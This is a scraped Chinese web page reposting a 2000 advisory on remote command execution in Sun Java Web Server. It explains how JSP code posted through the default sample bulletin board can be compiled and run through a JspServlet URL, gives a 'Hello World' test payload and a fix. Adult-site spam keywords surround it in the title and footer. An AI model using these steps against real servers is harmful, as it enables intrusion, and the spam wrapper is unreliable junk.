六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網(wǎng)中心:是一個免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺!

Sun Java Web服務(wù)器遠(yuǎn)程可執(zhí)行命令漏洞

[摘要]Sun Java Web服務(wù)器遠(yuǎn)程可執(zhí)行命令漏洞 漏洞發(fā)布時間:2000-7-13 17:41:00漏 洞 描 述:在Solaris and Windows NT的Sun Java Web Serv...
Sun Java Web服務(wù)器遠(yuǎn)程可執(zhí)行命令漏洞



漏洞發(fā)布時間:2000-7-13 17:41:00
漏 洞 描 述:

在Solaris and Windows NT的Sun Java Web Server默認(rèn)安裝設(shè)置下。通過公告版的樣板程序的漏洞,可以遠(yuǎn)程執(zhí)行任意命令。

漏洞測試方法如下:

下面的例子將顯示如何上載和執(zhí)行該代碼,而在服務(wù)器上顯示"Hello World"。

輸入下面的JSP代碼將打印出"Hello World":

<% String s="Hello World"; %>
<%=s %>

通過下面的公告版連接Post這段代碼:

http://jws.site/examples/applications/bboard/bboard_frames.html

檢驗是否該代碼真正的上載了:

http://jws.site/board.html

通過執(zhí)行下面的連接編譯和執(zhí)行該代碼:

http://jws.site/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspServlet/board.html

解 決 方 法:

仔細(xì)按照J(rèn)ava Web Server手冊中的"How to secure a web site that uses the Java Web Server" 一章進(jìn)行設(shè)置,或者參考下面連接:
http://www.sun.com/software/jwebserver/faq/jwsca-2000-02.html
或者簡單的移除默認(rèn)安裝的這些樣板文件。








主站蜘蛛池模板: 日韩在线视频二区 | 亚洲www网站 | 欧美性xxxxx极品老少 | 欧洲乱码专区一区二区三区四区 | 四虎影院视频在线观看 | 一区二区三区国产美女在线播放 | 热久久这里是精品6免费观看 | 婷婷狠狠五月天小说免费 | 天干夜天天夜天干天 | 特级黄色视频毛片 | 日本五级床片在线观看 | 欧洲一级片 | 四虎国产永久免费久久 | 亚洲人免费| 污在线视频 | 伊人久久大线蕉香港三级 | 日日摸人人拍人人澡 | 最近2019中文字幕大全第二页 | 在线观看亚洲免费视频 | 欧美一级在线播放 | 四虎国产成人免费观看 | 新版天堂中文资源官网 | 屁屁影院在线播放 | 色妹子影院 | 婷婷激情片 | 午夜免费毛片 | 欧美特黄一级大黄录像 | 青青视频免费观看 | 日韩精品视频在线 | 亚洲精品第四页中文字幕 | 亚洲国产情侣偷自在线二页 | 手机在线观看国产精选免费 | 青草网| 青青草手机在线视频 | 日韩一级特黄毛片在线看 | 综合久久网 | 亚洲人成高清 | 亚洲第一网站快活影院 | 中日韩欧美在线观看 | 亚洲狼人综合 | 日本高清免费一本视频无需下载 |